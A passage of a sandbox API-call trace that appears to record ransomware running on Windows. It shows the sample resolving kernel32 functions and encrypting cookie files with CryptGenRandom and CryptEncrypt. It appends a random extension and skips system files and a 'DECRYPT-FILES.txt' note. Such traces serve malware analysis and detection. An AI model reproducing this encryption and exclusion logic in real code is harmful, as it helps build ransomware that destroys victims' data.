returned="CreateProcessAsUserW" [0079.234] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.234] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.234] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.234] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.234] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.234] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.234] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.234] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.234] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.234] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.234] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.234] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.234] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.234] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.234] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.234] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.235] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.235] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.235] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.235] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.235] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.235] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.235] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.235] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.235] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.235] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.235] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.235] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.235] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.235] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.235] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.235] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.235] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.235] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.235] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.236] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.236] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.236] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.236] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.236] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.236] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.236] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.236] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.236] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.236] lstrlenA (lpString="DELETEATOM") returned 10 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.236] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.236] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.236] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.236] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.236] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.236] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.236] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.236] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.236] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.237] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.237] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.237] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.237] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.237] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.237] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.237] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.237] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.237] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.237] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.237] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.237] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.237] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.237] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.237] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.237] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.237] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.237] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.237] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.238] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.238] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.238] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.238] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.238] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.238] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.238] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.238] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.238] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.238] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.238] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.238] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.238] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.238] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.238] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.238] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.239] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt") returned 112 [0079.239] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN") returned 119 [0079.239] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qIkVSN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt.qikvsn"), dwFlags=0x0) returned 1 [0079.239] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.239] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.240] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.240] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4611db50, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x4611db50, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x4611db50, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x201, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", cAlternateFileName="5P74F0~1.TXT")) returned 1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="autorun.inf") returned -1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="boot.ini") returned -1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="desktop.ini") returned -1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="ntuser.dat") returned -1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="iconcache.db") returned -1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="bootsect.bak") returned -1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="thumbs.db") returned -1 [0079.240] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@at.atwola[1].txt", lpString2="Bootfont.bin") returned -1 [0079.240] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@at.atwola[1].txt") returned 37 [0079.240] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.240] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.240] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.240] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.240] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.240] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@at.atwola[1].txt") returned 37 [0079.240] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.241] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@at.atwola[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" [0079.241] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.242] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=513) returned 1 [0079.242] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.242] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.242] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.242] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.242] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.243] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.243] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.243] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.243] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.244] CloseHandle (hObject=0x464) returned 1 [0079.244] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.244] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.245] CloseHandle (hObject=0x0) returned 0 [0079.245] CloseHandle (hObject=0x460) returned 1 [0079.245] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.246] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.246] GetTickCount () returned 0x114c4e5 [0079.246] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.247] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.247] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.247] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.247] lstrlenA (lpString="kernel32.dll") returned 12 [0079.247] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.247] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.247] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" 